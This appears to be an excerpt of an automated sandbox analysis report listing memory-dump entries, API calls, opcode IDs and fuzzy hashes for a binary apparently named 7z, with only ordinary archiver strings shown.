                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                • Instruction ID: f3be00b4fbd1e68935a5dc608835f9a40046f501899de6bfdc184ea32991ec05
                                                                                                                                                                • Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
                                                                                                                                                                • Instruction Fuzzy Hash: 5011D722312A44D5CF14EF7AD8A966C7320FBC1F99B144662AF7E4B766CF28C8568344
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                • Instruction ID: b8031194e9480ffef52113dd0395f66d42d287e5f132349f61c6f936b330cefa
                                                                                                                                                                • Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
                                                                                                                                                                • Instruction Fuzzy Hash: 80513862201A44D1CF10EF25D494BEE6721F785BC8F90802AEA4E97769DF7CCA9AC741
                                                                                                                                                                APIs
                                                                                                                                                                • fputs.MSVCRT ref: 007D15D5
                                                                                                                                                                  • Part of subcall function 007DB1C8: memset.MSVCRT ref: 007DB20D
                                                                                                                                                                  • Part of subcall function 007DB1C8: fputs.MSVCRT ref: 007DB232
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                • API String ID: 3543874852-295398807
                                                                                                                                                                • Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                • Instruction ID: e2d27ea39fc18a5800073ff822b85005643b6b6c6b9e492c7310ea4c01eebedf
                                                                                                                                                                • Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                • Instruction Fuzzy Hash: 85119462746682E4DF51EB29E9443E82370E749B98F5D8436DE0E4A351EF3DD4CAC310
                                                                                                                                                                APIs
                                                                                                                                                                • free.MSVCRT ref: 007C4A5C
                                                                                                                                                                • free.MSVCRT ref: 007C4A67
                                                                                                                                                                • free.MSVCRT ref: 007C4AE4
                                                                                                                                                                  • Part of subcall function 00793314: memmove.MSVCRT ref: 00793339
                                                                                                                                                                • free.MSVCRT ref: 007C4B0F
                                                                                                                                                                • free.MSVCRT ref: 007C4B1A
                                                                                                                                                                  • Part of subcall function 00792130: malloc.MSVCRT ref: 00792134
                                                                                                                                                                  • Part of subcall function 00792130: _CxxThrowException.MSVCRT ref: 0079214F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                • Opcode ID: f09d109643d5301a863dcbc1eac6ebc95d32b47500cc1e90382adc6eb8b9989f
                                                                                                                                                                • Instruction ID: c35ac2fb826f4d590a72045e76a08e43d90d5e8cb642f3b2b8f9f1aa0a7e3b6f
                                                                                                                                                                • Opcode Fuzzy Hash: f09d109643d5301a863dcbc1eac6ebc95d32b47500cc1e90382adc6eb8b9989f
                                                                                                                                                                • Instruction Fuzzy Hash: 37416D23245A84D1CF20EF25E4647AE6761F786B84F48513AEB8E47729DF3CC996C314
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                • Instruction ID: 4327d90bd257b4ebf80268111665379f11d7b4865f46a44e35dadb92dad1dc5c
                                                                                                                                                                • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                • Instruction Fuzzy Hash: C1311C71A18B85C6EB11DF28E99036A7770F784B64F504226E6AE477F4DB3CE885CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$fputsmemmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4106585527-0
                                                                                                                                                                • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                • Instruction ID: 36f207aff5a443b3b759e45fe6125b17fadf89e2fd7a4e6db61a42760a316f72
                                                                                                                                                                • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                • Instruction Fuzzy Hash: D5015263248444D1DE20BB25F85556E6721EBC5BE4F045321BA6F877F9DE2CC687C700
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                • Instruction ID: 634b7da231ed1de5613c9b779bb86802ddc84be15447f19a3226c6afb702c734
                                                                                                                                                                • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                • Instruction Fuzzy Hash: 3F01FD22308205D2CE30AB25B99423E17659B8A7F0F184321AE6E873A5CE2CCD8B9700
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: a086575436bb1dab92896187efcc91c1141d2fc1101c006b67dc30f66384b578
                                                                                                                                                                • Instruction ID: 1d17266fae611aa1ee388ff7ac487e448296cbe7e86e3afbed9680b34cac62a1
                                                                                                                                                                • Opcode Fuzzy Hash: a086575436bb1dab92896187efcc91c1141d2fc1101c006b67dc30f66384b578
                                                                                                                                                                • Instruction Fuzzy Hash: 7E31B063715684D6CB20EF26E4845AEBBA1F7887A0B588235EF6E47759DB3CC842C710
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                • Instruction ID: a8a3e41436c7acdb6a50bd45da595035dc55be75116b4273f9df450e2fe33615
                                                                                                                                                                • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                • Instruction Fuzzy Hash: 4B116521218544A1DE10FB25F9553AA9760EBD13F0F405221BBAE87AEADE1CC94BCB00
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                • Instruction ID: 02686c969e966a325d84018d662cf93758c9ffe55d2ad2cc457f82f48c9e6ea1
                                                                                                                                                                • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                • Instruction Fuzzy Hash: 7D01DB22254544D0CD20FB22F45D6AF9321FBC27E4F4412217E9E576B6CE2CC54BC704
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 007989D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 007989EA
                                                                                                                                                                • CreateFileW.KERNELBASE ref: 00798D51
                                                                                                                                                                • CreateFileW.KERNEL32 ref: 00798DA4
                                                                                                                                                                • free.MSVCRT ref: 00798DB2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 210839660-0
                                                                                                                                                                • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                • Instruction ID: 6c789107ef60a3baf8e36024e28542b8984676545ab45927b7a262065b5c5546
                                                                                                                                                                • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                • Instruction Fuzzy Hash: 652180332046819ACBA09F15B845A5A6724F79A7F4F540321EFBA43BE4CF3DC896CB00
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00793274: memmove.MSVCRT ref: 007932AC
                                                                                                                                                                • fputs.MSVCRT ref: 007D2D41
                                                                                                                                                                • fputs.MSVCRT ref: 007D2DCF
                                                                                                                                                                • free.MSVCRT ref: 007D2DFF
                                                                                                                                                                  • Part of subcall function 00792300: fputc.MSVCRT ref: 00792311
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputs$fputcfreememmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1158454270-0
                                                                                                                                                                • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                • Instruction ID: 09f25830138715575afd7e51a10597856dd326880fddfeef067d5a624dfe4f03
                                                                                                                                                                • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                • Instruction Fuzzy Hash: 9B213262745A01D1CF20FB25F85525E6331EB99BE4F489222EA5F4776ADE2CC5478700
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputc
                                                                                                                                                                • String ID: Kernel
                                                                                                                                                                • API String ID: 1992160199-1736990243
                                                                                                                                                                • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                • Instruction ID: 4b532cd11a3453e8dc19b841a5d62d7e0e3bfe755497df04fa5e64f2bc68c479
                                                                                                                                                                • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                • Instruction Fuzzy Hash: 72C09B55B5460883EF1417B7E8453251221D75DF91F185031CE1D07350D91CD4D68711
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32 ref: 007C3E2A
                                                                                                                                                                  • Part of subcall function 00792130: malloc.MSVCRT ref: 00792134
                                                                                                                                                                  • Part of subcall function 00792130: _CxxThrowException.MSVCRT ref: 0079214F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                • String ID: h{
                                                                                                                                                                • API String ID: 2114622545-2919225065
                                                                                                                                                                • Opcode ID: 53aea2c750e75119cad48fb564047798f36c27bd60b9748b317531b4fdd21722
                                                                                                                                                                • Instruction ID: be1b906c6048d9262a34dd5c76a4204b55aa3462fde3467a7d7676982b3e5988
                                                                                                                                                                • Opcode Fuzzy Hash: 53aea2c750e75119cad48fb564047798f36c27bd60b9748b317531b4fdd21722
                                                                                                                                                                • Instruction Fuzzy Hash: F9318B32305B4086DB159F29E588B69B3A1FB89FD0F18852C9B5A07764DF3CC956C300
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 007DB20D
                                                                                                                                                                • fputs.MSVCRT ref: 007DB232
                                                                                                                                                                  • Part of subcall function 00792B04: _CxxThrowException.MSVCRT ref: 00792B2D
                                                                                                                                                                  • Part of subcall function 00792B04: free.MSVCRT ref: 00792B44
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3104931167-0
                                                                                                                                                                • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                • Instruction ID: 4c11f71d15815c4ec96f2ce248315434f5efe667c1ac8625f8f74e1cc2fff5b4
                                                                                                                                                                • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                • Instruction Fuzzy Hash: 5601ADA7700690EAE705DF6AEA8475E2730F759B94F098022DF0807711DB78E8AAC310
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,00000003,?,00798E1D), ref: 00798A99
                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000003,?,00798E1D), ref: 00798AA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                • Instruction ID: 110d86a7bcd3e603557d8533903d3eefe13d11993942245bfe86972209b98f89
                                                                                                                                                                • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F672B017C483DF608F69E8447582361EB5AB98F6CC023CA0943B50DF2EC882C711
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputcfputsfree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2822829076-0
                                                                                                                                                                • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                • Instruction ID: edeb5cd9ef2f95cdfb2e18d4e82a4372d73779f10c48443f7319525d8798d2ce
                                                                                                                                                                • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0126364594490CA20EB25F95935D5330E789BF8F485321EE6D477FADE2CC586C740
                                                                                                                                                                APIs
                                                                                                                                                                • memmove.MSVCRT ref: 007C404D
                                                                                                                                                                • memmove.MSVCRT ref: 007C4087
                                                                                                                                                                  • Part of subcall function 00793404: free.MSVCRT ref: 00793431
                                                                                                                                                                  • Part of subcall function 00793404: memmove.MSVCRT ref: 0079344C
                                                                                                                                                                  • Part of subcall function 00792130: malloc.MSVCRT ref: 00792134
                                                                                                                                                                  • Part of subcall function 00792130: _CxxThrowException.MSVCRT ref: 0079214F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                • Opcode ID: 922c4c0b2366e04d7b7bc81b27483721c255a8e103a606f9716e352ae471c5b3
                                                                                                                                                                • Instruction ID: 92bcb3998bb4d43ef2d28f8490d3c3cf0523a3dcbc7128d3dc6f83c649cace56
                                                                                                                                                                • Opcode Fuzzy Hash: 922c4c0b2366e04d7b7bc81b27483721c255a8e103a606f9716e352ae471c5b3
                                                                                                                                                                • Instruction Fuzzy Hash: 1B316D672196C5D6CA31EB14E5987EEB760F391340F40442AC79947B6AEF2CD69ACB00
                                                                                                                                                                APIs
